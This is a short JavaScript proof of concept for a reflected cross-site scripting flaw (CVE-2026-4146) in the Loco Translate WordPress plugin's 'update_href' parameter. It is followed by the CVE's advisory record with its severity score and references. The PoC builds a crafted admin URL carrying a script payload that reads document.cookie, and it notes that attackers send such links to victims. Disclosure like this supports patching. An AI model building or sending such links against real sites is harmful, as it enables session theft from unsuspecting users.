CVE-2026-4146

// Proof of Concept for CVE-2026-4146 // The vulnerability exists in the 'update_href' parameter. // Attackers can inject malicious scripts via this parameter. // Example Payload to demonstrate script execution var payload = "<script>alert(document.cookie)</script>"; // Constructing the malicious URL (Path may vary based on installation) // The parameter 'update_href' is vulnerable to XSS var targetUrl = "http://target-wordpress-site.com/wp-admin/admin.php?page=loco-translate&action=config&update_href=" + encodeURIComponent(payload); // In a real attack scenario, the attacker would send this link to a victim. // When the victim clicks, the script executes in their browser context. console.log("Exploit URL: " + targetUrl);

{"cve": {"id": "CVE-2026-4146", "sourceIdentifier": "[email protected]", "published": "2026-03-31T05:16:11.453", "lastModified": "2026-04-24T18:11:16.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Loco Translate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘update_href’ parameter in all versions up to, and including, 2.8.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Loco Translate para WordPress es vulnerable a cross-site scripting reflejado a través del parámetro 'update_href' en todas las versiones hasta la 2.8.2, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto permite a atacantes no autenticados inyectar scripts web arbitrarios en páginas que se ejecutan si logran engañar a un usuario para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.2/src/mvc/View.php#L259", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.2/tpl/admin/config/version.php#L17", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3482475/loco-translate", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/faa6c744-7586-47ee-b2ce-af972ee8b4f7?source=cve", "source": "[email protected]"}]}}